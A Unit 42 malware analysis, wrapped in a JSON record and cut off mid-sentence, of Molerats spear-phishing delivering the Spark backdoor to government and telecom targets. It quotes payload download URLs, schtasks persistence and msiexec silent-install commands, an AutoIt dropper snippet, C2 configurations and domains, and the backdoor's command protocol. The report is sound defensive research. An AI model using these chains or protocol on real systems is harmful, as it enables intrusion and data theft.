{ "id": "d9f85440-d3a9-46cc-bfb1-0a5bbea1a5a8", "created_at": "2026-04-06T00:12:27.961917Z", "updated_at": "2026-04-10T13:12:21.116654Z", "deleted_at": null, "sha1_hash": "d2ca9f65335364294199311f865dacef8fe13520", "title": "Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3032429, "plain_text": "Molerats Delivers Spark Backdoor to Government and\r\nTelecommunications Organizations\r\nBy Robert Falcone, Bryan Lee, Alex Hinchliffe\r\nPublished: 2020-03-03 · Archived: 2026-04-05 14:08:09 UTC\r\nExecutive Summary\r\nBetween October 2019 through the beginning of December 2019, Unit 42 observed multiple instances of phishing attacks\r\nlikely related to a threat group known as Molerats (AKA Gaza Hackers Team and Gaza Cybergang) targeting eight\r\norganizations in six different countries in the government, telecommunications, insurance and retail industries, of which the\r\nlatter two were quite peculiar. The targeting of insurance and retail organizations is peculiar as it does not fit with this threat\r\ngroups prior target set. The email subject and attachment file names used in the attacks on these seemingly atypical targets\r\nwere similar in theme as those used when attacking government organizations. The lack of industry or target specific social\r\nengineering themes likely lowers the chances of a successful compromise and further confuses our understanding of the\r\npurpose of attacking these organizations.\r\nAll of the attacks involved spear-phishing emails to deliver malicious documents that required the recipient to carry out\r\nsome action. The social engineering techniques included lure images attempting to trick the user into enabling content to run\r\na macro and even document contents that threaten to release compromising pictures to the media to coerce the user into\r\nclicking a link to download a malicious payload. The payload in a majority of these attacks was a backdoor called Spark,\r\nwhich is a backdoor that allows the threat actors to open applications and run command line commands on the compromised\r\nsystem.\r\nThe Spark backdoor has been used by Molerats since at least 2017 and is associated with the Operation Parliament\r\ncampaign, which is attributed to the Gaza Cybergang. The payload delivered in one of the attacks appears to be related to\r\nJhoneRAT, which may suggest the threat group has added another custom payload to their toolset.\r\nMolerats has been in operation as far back as 2011 targeting government organizations around the world, largely been\r\nassociated with attacks involving unauthorized access and sensitive data collection.They have been observed using a bevy of\r\ntactics and techniques, ranging from leveraging publicly available backdoor tools, such as PoisonIvy or XtremeRAT, to\r\ncreating custom developed ones such as KASPERAGENT and MICROPSIA. In the campaign that we tracked, this group\r\nprimarily relied on social engineering and spear-phishing techniques for their initial infection vector, then multi-stage\r\ncommand-and-control (C2) servers for malware delivery.\r\nMolerats used a variety of techniques to make detection and analysis difficult, such as password-protecting delivery\r\ndocuments, limiting the execution of the Spark payload to only run on systems with an Arabic keyboard and locale and the\r\nuse of the commercial packer Enigma to obfuscate the payloads. The Spark C2 channel also attempts to evade detection, as\r\nthe data in the HTTP POST requests and responses is encrypted using either 3DES or AES with randomly generated keys\r\nthat appear to be unique for each payload.\r\nStarting Point\r\nIn November 2019, Unit 42 was made aware of a single phishing email directed at a Saudi Arabian government\r\norganization. This attack involved a password-protected Microsoft Word document, which contained an embedded macro.\r\nThe password for the document was provided to the victim in the body of the email. From the artifacts discovered in this\r\nattack, we were able to use our AutoFocus product to pivot to additional attacks and uncover what turned out to be an attack\r\ncampaign by Molerats.\r\nUsing our AutoFocus tool, we were able to find several attacks sent from the actors starting on October 2 through December\r\n9, 2019. The emails were sent to organizations in the government and telecommunications verticals and had a mixture of\r\nspecific and generic email subjects and attachment filenames. We also saw sessions associated with this attack campaign\r\ninvolving two US-based organizations, one in the retail and the other in the insurance industry.\r\nThe files attached to these emails were all documents, with the majority being Word documents and one PDF document.\r\nTable 1 shows a list of the emails used in this attack campaign, including the details of the email and the country and\r\nindustry of the targeted organization. In this blog, we will provide an analysis of three of the seven delivery documents listed\r\nin Table 1, as the four unique delivery documents with MOFA in their file names are extremely similar to each other. The\r\nlast delivery document (‘Urgent.docx’) was the delivery document discussed in Cisco Talos' research on a new payload\r\ncalled JhoneRAT, which may suggest that this group also uses JhoneRAT in their attack campaigns in the region.\r\nDate Subject Attachment SHA256 Country Industry\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 1 of 21\n\n10/2/2019 MOFA reports 03-10-2019\r\nMOFA-031019.doc\r\nd19104ef4f443e8.. AE Gov\r\n10/3/2019 03-10-2019\r\nMOFA-031019.doc\r\nd19104ef4f443e8.. UK,ES Gov\r\n10/5/2019 06-10-2019\r\nMOFA-061019.doc\r\n03be1d7e1071b01.. AE Gov\r\n10/10/2019 MOFA Reports\r\nMOFA-101019.doc\r\n011ba7f9b4c508f..\r\nddf938508618ff7..\r\nUS Insurance,Retail\r\n10/31/2019\r\nلعناية معاليكم - المرفق -10-31\r\n2019\r\nattachment.doc eaf2ba0d78c0fda.. DJ Telecom\r\n11/2/2019\r\nلعناية معاليكم - المرفق -10-31\r\n2019\r\nattachment.doc eaf2ba0d78c0fda.. DJ Telecom\r\n11/18/2019\r\nصورك\r\n\u003credacted\u003e\r\nمع هبة\r\nPictures.pdf 9d6ce7c585609b8.. ES Gov\r\n11/24/2019\r\nمخطط الجهاد االسالمي لمباغتة\r\nاسرائيل وضرب التهدئة\r\nUrgent.docx 273aa20c4857d98.. DJ Telecom\r\n12/9/2019\r\nمحضر اجتماع قيادة المخابرات\r\nالعامة مع وفد حركة حماس -09\r\n2019-12\r\nUrgent.docx 273aa20c4857d98.. DJ Telecom\r\nTable 1. Details of spear-phishing emails seen in this attack campaign\r\nMOFA Delivery Document\r\nThe first document we collected and analyzed had the filename MOFA- 061019.doc (SHA256:\r\n03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506). This document was password-protected with\r\nthe password Abdullah@2019. When opening and supplying the password, the victim was presented with contents that\r\ninclude what appears missing images, as seen in Figure 1.\r\nFigure 1. Lure image in MOFA delivery document\r\nOnce the victim then enabled the embedded macro inside the document, the macro decodes an embedded VBScript (T1064)\r\nand saves it to C:\\programdata\\Micorsoft\\Microsoft.vbs. The Microsoft.vbs script will reach out to the C2 domain\r\nservicebios[.]com to retrieve a second VBScript, which contained additional instructions to then retrieve the payload. The\r\nscript downloads this secondary VBScript from the following URL and saves it to C:\\ProgramData\\PlayerVLC.vbs:\r\nhttps://servicebios[.]com/PlayerVLC.vbs\r\nThe initial VBScript will then create a scheduled task (T1053) to persistently run the secondary VBScript every minute by\r\nrunning the following command:\r\nschtasks /create /sc minute /mo 1 /tn PlayerVLC /F /tr C:\\ProgramData\\PlayerVLC.vbs\r\nThe secondary VBScript attempts to download the executable payload from the following URL and saves it to\r\nC:\\ProgramData\\PlayerVLC.msi.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 2 of 21\n\nhttps://servicebios[.]com/PlayerVLC.msi\r\nAfter downloading the executable payload, the secondary VBScript runs the following command on the command line\r\n(T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using\r\nthe legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file:\r\n%comspec% /c taskkill /F /IM msiexec.exe \u0026 ping 127.0.0.1 -n 2 \u003eNUL \u0026 msiexec /i C:\\ProgramData\\PlayerVLC.msi\r\n/quiet /qn /norestart\r\nUnfortunately, we were unable to obtain the PlayerVLC.msi file, as it was no longer hosted by the C2 server. This highlights\r\nthe benefits of a modular payload that requires a chain of successful communications with a C2 server for a successful\r\ninfection, as it makes post-intrusion analysis difficult. This type of modular payload and chained C2 requests is fairly\r\ncommon, as we have seen it in use by various adversaries such as DarkHydrus and Sofacy. This behavior can assist the\r\nadversary in evading automated defenses, as they can deploy their infrastructure at time of attack and avoid having\r\nadditional artifacts available for further analysis.\r\nAttachment Delivery Document\r\nThe Word document delivered on October 31 and November 2, 2019 (SHA256:\r\neaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000) had a filename of attachment.doc and attempted\r\nto trick the recipient into clicking the “Enable Content” button to run an embedded macro. Figure 2 shows the lure image\r\nused in an attempt to trick the recipient into clicking the “Enable Content” button. These documents were not password-protected, unlike the MOFA delivery documents previously discussed.\r\nFigure 2. Lure image in Attachment delivery document\r\nThe macro is quite simple, as it attempts to download a base64 encoded executable from the following Google Drive URL\r\nthat it will decode and save to %TEMP%\\rundll64.exe:\r\nhxxps://drive.google[.]com/uc?export=download\u0026id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH\r\nThe decoded executable (SHA256: 7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128P) is a\r\ncompiled AutoIt script that installs an embedded executable to %userprofile%\\runawy.exe and runs it. Before exiting, the\r\nAutoIt script also makes sure the executable will persistently run by copying the executable to the startup directory and by\r\ncreating a scheduled task by running the following command:\r\nSCHTASKS /Create /f /SC minute /TN \"runawy\" /mo 5 /tr \"%userprofile%\\runawy.exe\"\r\nThe runawy.exe file (SHA256:64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431) is a payload\r\npacked with Enigma that creates a mutex of “S4.4P”. This payload is a packed variant of the Spark backdoor, which has\r\nbeen exclusively linked to Molerats. We will discuss the Spark backdoor’s functionality in detail later in this blog, but this\r\nspecific sample has the following configuration:\r\n{\"sIt\":\"nysura[.]com\",\"QrU\":\"/\",\"JJDF\":80,\"MJOu\":0,\"TuS\":\"\",\"pJhC\":1,\"Lm\":\"NMRm3AlaGUeT2g9iA2lNTIk04vSj8r2IBUDEvItgOxw=\",\"LPO\":1000\r\nPictures PDF Delivery Document\r\nUnlike the prior two Word documents discussed, we observed a PDF document named “Pictures.pdf”\r\n(SHA256:9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495) attached to an email with a subject\r\nof صورك\u003e redacted\u003e هبة مع, which roughly translates from Arabic to “Your filthy pictures with Heba”. The PDF document\r\ndoes not attempt to exploit a vulnerability, rather it contains a message meant to coerce the recipient into clicking a link to\r\ninstall the actor’s payload. Also, unlike the Word delivery documents that used finesse lure images and missing content in an\r\nattempt to trick the user into enabling macros, this PDF document uses a more brash approach that contained a blackmail-esque message in an attempt to trick the user into clicking a link, opening a RAR archive and running an executable.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 3 of 21\n\nThe message within the PDF document is in Arabic and suggests the sender has compromising pictures of the recipient that\r\nthey will release to the media. The message also suggests the document was sent to an associate of a government official and\r\nwas meant to threaten the victim into clicking a link within the document. Figure 3 shows the contents within the PDF\r\ndocument.\r\nFigure 3. Screenshot of the contents of the malicious PDF document\r\nThe link within the document is in Arabic and roughly translates to “A small sample of your filthy pictures with Heba” and\r\n“Pictures”. The link points to the following URL, which is case sensitive:\r\nhxxps://zmartco[.]com/Pictures.rar\r\nThe \"Pictures.rar\" file (SHA256: 1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da) is a RAR\r\narchive that contains one file with a filename of الصور من قليلة عينة هذه.exe (SHA256:\r\n92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7), which roughly translates to \"This is a few\r\nsample photos.exe\". The executable is a compiled AutoIt script that extracts an embedded executable, saves it to disk at\r\nC:\\Users\\Public\\pdf.exe (SHA256: 5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3) and\r\ncreates a shortcut in Start Menu\\Programs\\Startup\\pdf.lnk to automatically start it each time the system starts, as seen here:\r\n#NoTrayIcon\r\nFileInstall(\"pdf.exe\", \"C:\\Users\\Public\\\" \u0026 \"/pdf.exe\")\r\n$cmd1 = \"C:\\Users\\Public\\\" \u0026 \"\\pdf.exe\"\r\nRunWait(@ComSpec \u0026 \" /c start \" \u0026 $cmd1, \"\", @SW_HIDE)\r\nFileCreateShortcut(\"C:\\Users\\Public\\\" \u0026 \"\\pdf.exe\", @StartupDir \u0026\r\n\"\\pdf.lnk\")\r\nLike the “runawy.exe” payload delivered by the attachment.doc Word document, the \"pdf.exe\" file saved to the system is a\r\npacked variant of the Spark backdoor. This variant of the backdoor had the following configuration:\r\n{\"xBql\":\"laceibagrafica[.]com\",\"eauy\":\"/\",\"Qnd\":80,\"jJN\":0,\"rlOa\":\"\",\"Eb\":1,\"BGa\":\"vcJbq6nzgJk=\",\"qJk\":10000}\r\nDelivery Infrastructure\r\nOften when investigating attacks like these, links between infrastructure used across distinct campaigns can be easily found,\r\nsuch as by tracking reused IP addresses or domains, finding related domains sharing similar attributes, and so on. In the case\r\nof all the MOFA-related delivery documents listed in Table 1, servicebios[.]com was the only domain used, and most of the\r\ninfrastructure information related to historical usage.\r\nWith the AutoFocus Threat Intelligence service, we used alternative data points provided from our cloud sandbox, WildFire,\r\nduring the analysis of said malicious documents in order to pivot and discover additional samples and related infrastructure.\r\nIn this section we will discuss the methods we used and describe the additional infrastructure.\r\nFigure 4 below is a maltego chart showing the Word documents and Visual Basic Script (vbs) files related to the\r\nservicebios[.]com domain in the bottom half of the chart, with some of the related entities connected via one of two links, to\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 4 of 21\n\nother entities in the top half of the chart. Said links include Yara signatures in the blue box and an AutoFocus query in the\r\norange box, as indicated by the “AF” for AutoFocus.\r\nFigure 4. Chart showing relationships between delivery documents and associated infrastructure\r\nThe AutoFocus query relates to a specific process execution chain leading to a Windows Scripting Host process\r\n(wscript.exe) launching the malicious VBS downloader scripts. This allowed us to pivot on behavioural artefacts from the\r\n“MOFA- 101019.doc” (SHA256: ddf938508618ff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8) document to\r\npreviously unknown documents “2019 - 9 - 9 - ليوم الفلسطينية المستجدات أهم حول اليومي التقرير.doc” (Daily report on the most\r\nimportant Palestinian developments, 9-9-2019.doc; SHA256:\r\nfeec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21) and “-العالمي اإلرهاب مستجدات أخر حول اليومي التقرير\r\n2019 - 9 - 9.doc” (Daily updates on the latest terrorism report Alaalmi- 9 - 9 - 2019.doc; SHA256:\r\nbf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959).\r\nAs with the original Word document, the VBA macro code inside the new documents also used the open-source code\r\n“Base64 decode VBS function” from Motobit to decode (T1027) the download function and URL to VBS before running it.\r\nThe main difference between the VBS files is the domain - dapoerwedding[.]com - where the secondary VBS payload was\r\nhosted. At the time of this activity the domain resolved to 45.15.168[.]118 and was used in a previous campaign from\r\nSeptember 2019.\r\nIn parallel to searching for related files using behavioural commonalities, we authored Yara signatures for the VBS code\r\nassociated with the original delivery document, to scan our and VirusTotal’s corpus. This led to two additional VBS files:\r\nSHA256: 85631021d7e84dc466b23cf77dd949ebc61011a52c1f0fb046cfd62dd9192a15 represents the 1st stage VBS\r\ndownloader containing minor changes to the domain and filename used, as follows:\r\nhttps://dapoerwedding[.]com/GoogleChrome.vbs\r\nThe second VBS file discovered (SHA256: 9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7) is\r\nthe 2nd stage VBS downloader with reference to the final MSI file payload, which was unavailable at the time of writing:\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 5 of 21\n\nhttps://dapoerwedding[.]com/GoogleChrome.msi\r\nWe were also able to discover additional Word documents using other AutoFocus queries, as highlighted by the two other\r\nAutoFocus “AF'' orange boxes in Figure X above. These maltego entities query our data using proprietary hashes calculated\r\nfrom the original document’s VBA macro code, and resulted in SHA256:\r\n602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb (servicebios[.]com), and SHA256s:\r\na2c68da1b3e0115f5804a55768b2baf50faea81f13a16e563411754dc6c0a8ff and\r\n4f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba (dapoerwedding[.]com).\r\nUpon initial inspection of dapoerwedding[.]com and servicebios[.]com, nothing stood out as having ties to previously\r\ndocumented Molerats activity, however there were some commonalities (T1347) between the two domains:\r\n1. Pre-existing domains\r\n2. Seemingly legitimate historical content\r\n3. Recently expired (and lapsed domain redemption grace period)\r\n4. Post-expiry registrant (T1328) is NameCheap, Inc.\r\n5. Domain Validation (DV) SSL Certificates setup (T1337), issued by Sectigo\r\nAnother delivery domain - zmartco[.]com - that shares the same commonalities listed above pertains to the “Pictures.pdf”\r\ndelivery attachment listed in Table 1 discussed in the previous section.\r\nSpark Payload Related to Operation Parliament\r\nThe executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns.\r\nUntil recently, this backdoor did not have its own moniker, but Cybereason recently gave this backdoor a name of “Spark”.\r\nAs mentioned in Cybereason’s blog, the Spark backdoor was also delivered in attacks occurring in January 2019, as\r\ndiscussed in a blog published by Qihoo 360. Based on our research, the Spark backdoor has been used by Molerats since at\r\nleast early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky.\r\nSpark uses HTTP POST requests to communicate with its C2 server to receive commands and to exfiltrate the results, all of\r\nwhich using JSON-structured messages. In most cases, the threat actors use commercial packers to obfuscate the Spark\r\npayload to avoid detection. During our research, we have seen the actors use the Enigma protector, Themida and VMProtect,\r\nwhich makes identifying samples difficult. We were also able to identify two different versions of Spark-based identifiers\r\nleft in the binaries by the developer, which are version 2.2 and 4.2. Based on the compilation times of the files with the\r\nSpark samples with identifiable version strings, it appears that version 2.2 was created in 2017, while version 4.2 was\r\ncreated in late December 2019 and January 2020. Table 2 shows these Spark samples that contained version numbers, along\r\nwith their compile time and the packer used to obfuscate their contents.\r\nTruncated SHA256 Version Compiled Packer\r\n966ad6452793b15.. 2.2 2017-05-24 6:15:04 VMProtect\r\nab4e43b4e526d44.. 2.2 2017-05-24 6:15:04 VMProtect\r\n212aa6e3f236550.. 2.2 2017-05-24 6:15:04 VMProtect\r\ncf32479ed30ae95.. 4.2 2019-12-30 9:45:44 none\r\nd0dc1de0ae912c7.. 4.2 2020-01-12 10:57:50 Enigma\r\n04fa6aaea5e3a26.. 4.2 2020-01-12 10:57:50 Enigma\r\n6e60f5c65299ee7.. 4.2 2020-01-12 10:57:50 Enigma\r\nb08b8fddb9dd940.. 4.2 2020-01-12 10:57:50 Enigma\r\n64ea1f1e0352f3d.. 4.2 2020-01-12 10:57:50 Enigma\r\nTable 2. Spark samples with their version number, compile time and the packer used\r\nWe have collected dozens of Spark payloads, whose compile times range from March 2017 to January 2020, which further\r\nsuggests this group has been using this backdoor in attack campaigns for almost three years. We extracted the configurations\r\nfrom each of these files to gather the known C2 domains associated with Spark, which we have included in Table 3.\r\nDomain First used\r\nwebtutorialz[.]com 1st Half 2020\r\nnysura[.]com 1st Half 2020\r\nlaceibagrafica[.]com 2nd Half 2019\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 6 of 21\n\nmotoqu[.]com 2nd Half 2019\r\nsmartweb9[.]com 1st Half 2019\r\nlaptower[.]com 2nd Half 2018\r\napp.msexchanges16[.]com 2nd Half 2018\r\nmsexchange13[.]com 2nd Half 2018\r\ncloudserviceapi[.]online 2nd Half 2018\r\nupdates.masterservices[.]online 2nd Half 2018\r\nclients.itresolver[.]online 1st Half 2018\r\nupdate.itresolver[.]online 1st Half 2018\r\n91.219.237[.]99 2nd Half 2017\r\ngoldenlines[.]site 2nd Half 2017\r\nupdate.nextdata[.]site 2nd Half 2017\r\nTable 3. Spark C2 domains and the approximate time they were used\r\nIn the next section, we will explain Spark’s capabilities and demonstrate its C2 channel that we determined from our\r\nanalysis of the “pdf.exe” payload delivered by the Pictures.pdf document in the November 2019 attack.\r\nSpark Payload in Pictures.pdf November 2019 Attack\r\nThe Spark payload installed by the compiled AutoIt script is packed with the commercial Enigma protector (T1045). When\r\npacking the payload, the actor used a feature within Enigma protector called “Splash Screen”, which the actor configured to\r\ndisplay an image on top of all the windows and waits for the user to click the image before executing the malicious code.\r\nFigure 5 shows the splash image displayed by the Enigma protector prior to executing the malicious payload, which is a\r\nwallpaper image available at wallpaperswide.com. The splash screen feature acts as a sandbox evasion technique, as it\r\nrequires user interaction in the form of clicking the screen before the malicious code runs.\r\nFigure 5. Screenshot of the contents of the malicious PDF document\r\nOnce unpacked, we found the Spark payload was similar to the payloads delivered in Operation Parliament from a capability\r\nperspective. The Spark payload is a backdoor that allows the threat actors to open applications and run command line\r\ncommands on the compromised system.\r\nThe payload starts by checking the results of the GetKeyboardLayoutList and the language name returned by\r\nGetLocaleInfoA to make sure they contain the word \"arabic\". If the word is not found in the results of these two API calls,\r\nthe payload does not execute any of its malicious code. Checking for specific keyboards and languages is a known evasion\r\ntactic meant to avoid running on analysis systems not configured, as the actor’s targeted victim would be configured.\r\nAfter the payload confirms that the system has the appropriate keyboard and language pack installed for the actor’s desired\r\ntarget, it will begin attempting to communicate with a C2 server specified within a configuration embedded within the\r\npayload. The embedded configuration is encrypted and the payload decrypts it by first using a custom rolling XOR\r\nalgorithm to decrypt a key and a buffer of ciphertext, resulting in a key and ciphertext that appears encoded with base64. It\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 7 of 21\n\nwill then generate the SHA256 hash of the base64 encoded key and use the fourth through the 28th bytes of the resulting\r\nhash as the final key. The payload will base64 decode the ciphertext and use the final key to decrypt the decoded ciphertext\r\nusing Triple DES (3DES), which results in a configuration that is structured in JSON. This particular payload had the keys\r\nand values seen in Table 3 below.\r\nJSON\r\nField\r\nJSON Value Description\r\nxBql laceibagrafica[.]com Hostname of C2 server\r\neauy / URI of C2 server\r\nQnd 80 TCP port for C2 server\r\njJN 0 Sleep interval before entering the main C2 communications loop.\r\nrlOa \u003cempty string\u003e Unknown and does not appear to be used.\r\nEb 1 Unknown purpose, but sent to the C2 in the BrandentlK field\r\nBGa vcJbq6nzgJk=\r\nHardcoded base64 encrypted string, which is the “Nickname” field likely used as\r\na campaign identifier\r\nqJk 10000\r\nNumber of iterations of the main C2 communications loop before exiting the\r\napplication.\r\nTable 3. JSON key/value pairs within the payload’s configuration\r\nThe payload also uses this same routine to decrypt an encrypted buffer that contains sleep intervals and more importantly a\r\nlist of first names used to structure the messages sent to and from the C2 server, as well as the keys used to decrypt these\r\nmessages. The payload will use the first names listed in Table 4 as JSON key names and values within messages sent to and\r\nreceived from the C2. We provide a description of each element of this decrypted buffer in the Appendix, but also show how\r\nthe names in Table 4 are used within the C2 communications later in this blog. Each of the values in Table 4 are unique per\r\nSpark sample, as the developer changes the names and the keys for each payload.\r\nLawrence Alanih Nevaeh Garrison ReeceWNM\r\nAllier Averizt LondonzO Zeke MorganE\r\nJaseN MathiasNbo JoslynKe ReesefP Winston\r\nIvory BrandentlK AngelxEv FrederickT Jessicay\r\nJonas AdalynngS ZaydenlnL KaileeXws VanessaFM\r\nReginacy AdelineRD Houstonod EverlyY Jordanlzw\r\nTrumanRd CollinsPM Maximiliano CallieVK Aryana\r\nTable 4. First names used by Spark as JSON key/value pairs used for C2 communications\r\nBefore communicating with the C2 server, the payload will decrypt one more buffer that contains strings that the payload\r\nuses for debugging messages, as well as the commands it will use to gather system information. Table 5 shows the strings\r\ndecrypted and their purpose.\r\nDecrypted String\r\n1\r\n311OEVZihfReZStoFf4cfg==\r\nZ9Q1WVryAIzLVSxF1yWRwg==\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 8 of 21\n\nP5K5He/2wSGGsvrFPKYpwg4KjBLyTOpbsGJwm1DckoyGK8eXeNMZCQBfHzkYRSjJlGcw6Ckn41X0MY3zJcU65uMvxpABv/g+ttABRJsG7js=\r\nAykC+x26hhd5DfrB/yly9gXcFsIlVxO9\r\nok\r\nCreate Pipe Error\r\nCreate processa error\r\nGet exit code process error\r\n0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^\u0026*()_+\r\nSet handle information error\r\nWait for single object error\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 9 of 21\n\nTable 5. JSON key/value pairs within a buffer that the payload uses to communicate with C2 server\r\nSpark C2 Communications\r\nThe payload communicates with its C2 server laceibagrafica[.]com by issuing HTTP POST requests with base64 encoded\r\nand encrypted messages in the data section. We had not seen any previous explanation of this C2 channel, so we will provide\r\nan overview of the back and forth communications between the payload and C2 server to show how this payload uses the\r\nnames in Table 4. To do this analysis, we created a C2 server to interact with the Spark payload to issue commands, so all of\r\nthe HTTP responses in this section are from the C2 server we created and not an actor developed C2 software. Figure 6\r\nshows an initial beacon sent from the payload to its C2 server. However, all of the outbound requests from the payload to the\r\nC2 will look similar visually, as they all use HTTP POST requests to the same URL with encoded and encrypted messages.\r\nFigure 6.Initial beacon sent from payload to C2 server\r\nThe data section in the initial beacon decodes and decrypts to the JSON message\r\n{\"CallieVK\":\"W10=\",\"ReeceWNM\":\"Jessicay\"}. The JSON message involves two key/value pairs with keys “ReeceWNM”\r\nand “CallieVK”, whose values transmit the communication type and the data, respectfully. For instance, the “ReeceWNM”\r\nkey includes the name “Jessicay” that is used to represent the initial beacon communication type. The payload will decrypt\r\nthe C2 servers’ response looking for a “EverlyY” field and uses the value for a sleep interval before continuing. Figure 7\r\nshows a response from the C2 server to the initial beacon, of which the response decrypts to {\"EverlyY\": 0}.\r\nFigure 7. Initial beacon sent from payload to C2 server\r\nAfter receiving the EverlyY response, the payload will gather system information, specifically the username, hostname and\r\nthe system specific UUID by running the following command line commands using ‘cmd.exe’:\r\n1. wmic csproduct get UUID | more +1 | cmd /q /v:on /c \"set/p .=\u0026echo(!.!\"\r\n2. hostname\r\n3. echo %username%\r\nThe payload will store each of these command results in JSON in base64 encoded ciphertext within a field name\r\n“ZaydenlnL” and using the first name “AngelxEv” to represent the type of data, which is a number that corresponds to the\r\nresults in the list above with 1 representing the UUID, 2 the hostname and 3 the username. These three JSON objects are\r\nadded to a JSON array with a name of “Maximiliano” and sent to the C2 server. For example, the payload stores the system\r\ninformation in JSON as follows:\r\n{\"Maximiliano\":[{\"AngelxEv\":1,\"Houstonod\":1,\"ZaydenlnL\":\"\u003cbase64 encoded ciphertext of UUID\u003e\"},\r\n{\"AngelxEv\":3,\"Houstonod\":1,\"ZaydenlnL\":\"\u003cbase64 encoded ciphertext of username\u003e\"},\r\n{\"AngelxEv\":2,\"Houstonod\":1,\"ZaydenlnL\":\"\u003cbase64 encoded ciphertext of hostname\u003e\"}]}\r\nThe payload will create an outbound communications JSON object by setting the encoded system information JSON to the\r\n“CallieVK” value and setting the “ReeceWNM” value to the communication type “JoslynKe”. The resulting JSON will\r\nresemble the following:\r\n{\"CallieVK\":\"\u003cbase64 encoded ciphertext of system information “Maximiliano” JSON array\u003e\",\"ReeceWNM\":\"JoslynKe\"}\r\nThe resulting JSON object is base64 encoded, encrypted and sent within the HTTP POST data to the C2 server, as seen in\r\nthe example request in Figure 8.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 10 of 21\n\nFigure 8. System information sent from payload to C2 server\r\nAfter sending the system information, the payload will expect to receive a command from the C2 server within the response.\r\nFigure 9 shows the response to this request that contains encrypted data that the payload will parse for commands to\r\nexecute.\r\nFigure 9. C2 server response containing ciphertext containing a command line command to execute\r\nThe payload does not have a command handler. Rather, it will process the JSON object within the C2’s response for\r\napplications to open and/or command line commands to run by calling the CreateProcessW API function. The expected\r\nJSON object contains an array named “Jordanlzw” that has one or more objects that will have a task identifier number in a\r\nfield “Ivory”, an application name to run in a “Alanih” field, and the command line arguments to pass to the application in a\r\n“TrumanRd” field. For instance, the decrypted response in Figure 9 contains a JSON object would instruct the payload to\r\nrun “c:\\windows\\system32\\cmd.exe” using the command line argument “/c whoami”, which effectively runs the “whoami”\r\ncommand:\r\n{\"Aryana\": 0, \"Jordanlzw\" :[{\"Ivory\" : 5, \"Jonas\" : true, \"Reginacy\" : false, \"TrumanRd\" :\r\n\"/NKg0zJdCDP1XlK9NJ4eJA==\", \"Alanih\" : \"i8KOnxchf86h8NKfF45XMETHhwTx6yF3AfMoWzyG9wA=\",\r\n\"LondonzO\" : true}]}\r\nAfter running the command provided by the C2, the payload will send a message to the C2 server that we believe is meant to\r\nnotify the C2 that it received the command by sending the specific task identifier to the server. The payload will notify the\r\nC2 using the communication type \"MorganE\" as seen in the following JSON:\r\n{\"CallieVK\":\"eyJKYXNlTiI6W3siTGF3cmVuY2UiOjV9XX0=\",\"ReeceWNM\":\"MorganE\"}\r\nThe decoded data within the “CallieVK” field will contain a JSON array with a name of “JaseN” that contains one or more\r\nobjects with a field name of “Lawrence” that contains the task numbers received, such as {\"JaseN\":[{\"Lawrence\":5}]}. This\r\nacknowledgement is sent to the C2 server, as seen in Figure 10:\r\nFigure 10. Payload notifying the C2 server that it received the command\r\nAfter acknowledging the receipt of command, the payload expects the C2 to respond with a JSON object with the “Allier”\r\nfield set to a number, such as {\"Allier\" : 7}. We are unsure of the purpose of this transmission or how the payload uses this\r\nnumber value, but Figure 11 shows the base64 encoded ciphertext containing the “Allier” field.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 11 of 21\n\nFigure 11 C2 server providing the Allier JSON object\r\nAfter receiving the “Allier” JSON object, the payload will send the results of the executed command(s) to the C2 server. The\r\npayload will create a JSON object with an array named “Zeke”, which will contain JSON objects that have a “FrederickT”\r\nfield used to store the result of the command, a “ReesefP” field to denote the task identifier, and a “KaileeXws” field to store\r\na boolean if the command was successful. The resulting JSON would look like the following when the result of the\r\n‘whoami’ command issued by the C2 is “test-system\\\u003credacted\u003e”:\r\n{\"Zeke\":[{\"FrederickT\":\"5yUu16Ae8WKt\u003credacted\u003e\",\"KaileeXws\":true,\"ReesefP\":5}]}\r\nThe payload will base64 encode this data and set the “CallieVK” field in the outbound JSON object with the “ReeceWNM”\r\nfield set to the “Winston” communication type, as seen in the 